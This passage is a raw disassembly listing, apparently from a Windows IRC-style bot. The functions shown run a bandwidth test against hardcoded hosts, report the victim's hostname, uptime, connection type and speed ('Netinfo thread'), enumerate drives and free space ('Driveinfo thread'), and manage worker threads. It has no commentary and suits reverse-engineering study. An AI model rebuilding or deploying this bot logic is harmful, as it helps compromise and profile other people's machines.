inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv ds:flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; ---------------------------------------------------------------------------
loc_408B30: ; DATA XREF: sub_408E4A+35�o
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0A60h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push offset dword_41EF48
lea eax, [ebp-414h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp-824h]
push eax
push 0
push 0
push offset dword_41EF48
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp-414h]
push eax
mov eax, [ebp-824h]
push dword ptr [eax+10h]
mov eax, [ebp-824h]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
push dword ptr [ebp-824h]
call dword_41DE8C ; freeaddrinfo
loc_408BBC: ; CODE XREF: .text:00408B84�j
call sub_409318
mov [ebp-8B8h], eax
mov eax, [ebp-8B8h]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp-830h], eax
mov eax, [ebp-8B8h]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp-820h], eax
mov eax, [ebp-8B8h]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp-82Ch], eax
push offset aUnknown ; "Unknown"
lea eax, [ebp-8B0h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aUnknown ; "Unknown"
lea eax, [ebp-10h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp dword_41DE7C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp-8B0h]
push eax
lea eax, [ebp-818h]
push eax
call dword_41DE7C ; InternetGetConnectedStateEx
test eax, eax
jz short loc_408C9F
mov eax, [ebp-818h]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp-10h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: .text:00408C7B�j
push offset aLan ; "LAN"
lea eax, [ebp-10h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: .text:00408C4F�j
; .text:00408C6E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov dword ptr [ebp-0A64h], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: .text:00408CA6�j
mov dword ptr [ebp-0A64h], offset aNo ; "No"
loc_408CBE: ; CODE XREF: .text:00408CB2�j
mov eax, [ebp-0A64h]
mov [ebp-8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov dword ptr [ebp-0A68h], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: .text:00408CCE�j
mov dword ptr [ebp-0A68h], offset aNo ; "No"
loc_408CE6: ; CODE XREF: .text:00408CDA�j
mov eax, [ebp-0A68h]
mov [ebp-8B4h], eax
call sub_408887
mov [ebp-828h], eax
mov dword ptr [ebp-81Ch], offset aBad ; "Bad"
cmp dword ptr [ebp-828h], 2EEh
jnb short loc_408D1D
mov dword ptr [ebp-81Ch], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: .text:00408D11�j
cmp dword ptr [ebp-828h], 1F4h
jnb short loc_408D33
mov dword ptr [ebp-81Ch], offset aGood ; "Good"
loc_408D33: ; CODE XREF: .text:00408D27�j
call sub_4088FC
mov [ebp-4], eax
cmp dword ptr [ebp-82Ch], 1
jnz short loc_408D50
mov dword ptr [ebp-0A6Ch], offset byte_41DE30
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: .text:00408D42�j
mov dword ptr [ebp-0A6Ch], offset dword_4191F4
loc_408D5A: ; CODE XREF: .text:00408D4E�j
cmp dword ptr [ebp-820h], 1
jnz short loc_408D6F
mov dword ptr [ebp-0A70h], offset byte_41DE30
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: .text:00408D61�j
mov dword ptr [ebp-0A70h], offset dword_4191F4
loc_408D79: ; CODE XREF: .text:00408D6D�j
cmp dword ptr [ebp-830h], 1
jnz short loc_408D8E
mov dword ptr [ebp-0A74h], offset byte_41DE30
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: .text:00408D80�j
mov dword ptr [ebp-0A74h], offset dword_4191F4
loc_408D98: ; CODE XREF: .text:00408D8C�j
push dword ptr [ebp-0A6Ch]
push dword ptr [ebp-82Ch]
push dword ptr [ebp-0A70h]
push dword ptr [ebp-820h]
push dword ptr [ebp-0A74h]
push dword ptr [ebp-830h]
mov eax, [ebp-4]
mov [ebp-0A7Ch], eax
and dword ptr [ebp-0A78h], 0
fild qword ptr [ebp-0A7Ch]
fdiv ds:flt_417274
push ecx
push ecx
fstp qword ptr [esp]
push dword ptr [ebp-828h]
push dword ptr [ebp-81Ch]
push dword ptr [ebp-8B4h]
push dword ptr [ebp-8]
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8B0h]
push eax
lea eax, [ebp-414h]
push eax
push offset dword_419284
push 400h
lea eax, [ebp-814h]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp-814h]
push eax
push offset aS ; "%s"
lea eax, [ebp-0A5Ch]
push eax
call sub_40D53F
add esp, 0Ch
push dword ptr [ebp-0A60h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset loc_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; ---------------------------------------------------------------------------
loc_408F2E: ; DATA XREF: sub_4091E2+35�o
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-5D4h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp-404h]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp-3EFh]
rep stosd
stosw
stosb
mov eax, dword_419398
mov [ebp-424h], eax
and dword ptr [ebp-418h], 0
and dword ptr [ebp-5D8h], 0
and dword ptr [ebp-414h], 0
mov dword ptr [ebp-410h], 1
loc_408FA6: ; CODE XREF: .text:00409169�j
lea eax, [ebp-424h]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp-5DCh], eax
cmp dword ptr [ebp-5DCh], 0
jz loc_409151
cmp dword ptr [ebp-5DCh], 1
jz loc_409151
cmp dword ptr [ebp-5DCh], 2
jnz short loc_408FE5
mov dword ptr [ebp-4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: .text:00408FDA�j
cmp dword ptr [ebp-5DCh], 3
jnz short loc_408FF7
mov dword ptr [ebp-4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: .text:00408FEC�j
cmp dword ptr [ebp-5DCh], 4
jnz short loc_409009
mov dword ptr [ebp-4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: .text:00408FFE�j
cmp dword ptr [ebp-5DCh], 5
jnz short loc_40901B
mov dword ptr [ebp-4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: .text:00409010�j
cmp dword ptr [ebp-5DCh], 6
jnz short loc_40902D
mov dword ptr [ebp-4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: .text:00409022�j
mov dword ptr [ebp-4], offset aUnknown_0 ; "unknown"
loc_409034: ; CODE XREF: .text:00408FE3�j
; .text:00408FF5�j ...
cmp dword ptr [ebp-5DCh], 5
jz short loc_40906A
cmp dword ptr [ebp-5DCh], 2
jz short loc_40906A
lea eax, [ebp-42Ch]
push eax
lea eax, [ebp-420h]
push eax
lea eax, [ebp-40Ch]
push eax
lea eax, [ebp-424h]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: .text:0040903B�j
; .text:00409044�j
push 8
push 0
lea eax, [ebp-42Ch]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: .text:00409068�j
push 0
push 100000h
push dword ptr [ebp-428h]
push dword ptr [ebp-42Ch]
call sub_416C90
mov [ebp-42Ch], eax
mov [ebp-428h], edx
cmp dword ptr [ebp-410h], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp-404h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: .text:004090A8�j
and dword ptr [ebp-410h], 0
loc_4090C6: ; CODE XREF: .text:004090BD�j
mov eax, [ebp-42Ch]
or eax, [ebp-428h]
test eax, eax
jz short loc_40910A
push dword ptr [ebp-428h]
push dword ptr [ebp-42Ch]
push dword ptr [ebp-4]
lea eax, [ebp-424h]
push eax
lea eax, [ebp-404h]
push eax
push offset dword_4193E4
lea eax, [ebp-404h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: .text:004090D4�j
push dword ptr [ebp-4]
lea eax, [ebp-424h]
push eax
lea eax, [ebp-404h]
push eax
push offset dword_4193D4
lea eax, [ebp-404h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: .text:00409108�j
mov eax, [ebp-42Ch]
mov ecx, [ebp-414h]
add ecx, eax
mov [ebp-414h], ecx
mov eax, [ebp-5D8h]
inc eax
mov [ebp-5D8h], eax
loc_409151: ; CODE XREF: .text:00408FC0�j
; .text:00408FCD�j
mov al, [ebp-424h]
add al, 1
mov [ebp-424h], al
movsx eax, byte ptr [ebp-424h]
cmp eax, 5Ah
jnz loc_408FA6
cmp dword ptr [ebp-5D8h], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp-404h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: .text:00409176�j
push dword ptr [ebp-414h]
push dword ptr [ebp-5D8h]
lea eax, [ebp-404h]
push eax
push offset dword_41939C
lea eax, [ebp-404h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp-404h]
push eax
push offset aS ; "%s"
lea eax, [ebp-5D0h]
push eax
call sub_40D53F
add esp, 0Ch
push dword ptr [ebp-5D4h]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset loc_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: .text:00416A06�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov dword_41E2D0, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_41E2D0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: .text:0040840E�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: .text:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, dword_41E2D0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call ds:dword_4170D0 ; GetTickCount
sub eax, dword_41E2D0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: .text:004168C6�p
push ebp
mov ebp, esp
and dword_41E2F0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov dword_41E2F8, eax
push offset dword_41E2D8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; ---------------------------------------------------------------------------
loc_4093B6: ; DATA XREF: sub_409479+35�o
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset word_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-20h], 0
and dword ptr [ebp-1Ch], 0
and dword ptr [ebp-4], 0
mov eax, [ebp+8]
mov eax, [eax]
mov [ebp-20h], eax
mov eax, [ebp+8]
mov eax, [eax+4]
mov [ebp-1Ch], eax
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push dword ptr [ebp-20h]
call ds:dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp dword_41DE38, 0
jz short loc_40942F
push dword ptr [ebp-20h]
push offset dword_419474
push offset aLast ; "#last"
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: .text:00409418�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: .text:0040940F�j
push dword ptr [ebp-1Ch]
call dword ptr [ebp-20h]
mov [ebp-24h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-24h]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: .text:loc_40942F�j
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
aHpfa db 'hp”A',0
aHhfa db 'hh”A',0
db 0FFh
dd 0D0E8EC75h, 83FFFF9Eh, 8BC30CC4h, 4D83E865h
db 0FCh, 0FFh
; ---------------------------------------------------------------------------
loc_409466: ; CODE XREF: .text:00409447�j
xor eax, eax
loc_409468: ; CODE XREF: .text:00409441�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: .text:00407797�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset loc_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call ds:dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; ---------------------------------------------------------------------------
loc_4094E6: ; DATA XREF: sub_4095A4+159�o
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset word_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
mov al, byte_41DE30
mov [ebp-19Ch], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp-19Bh]
rep stosd
stosw
stosb
and dword ptr [ebp-4], 0
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp-1A0h], eax
mov eax, [ebp+8]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp-19Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push dword ptr [ebp+8]
mov eax, [ebp+8]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp-1A4h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1A4h]
jmp short loc_409593
; ---------------------------------------------------------------------------
dw 858Dh
dd 0FFFFFE64h, 94686850h, 75FF0041h, 9DA5E8ECh, 0C483FFFFh
dd 658BC30Ch, 0FC4D83E8h
db 0FFh, 33h, 0C0h
; ---------------------------------------------------------------------------
loc_409593: ; CODE XREF: .text:00409570�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp dword_41E2F0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
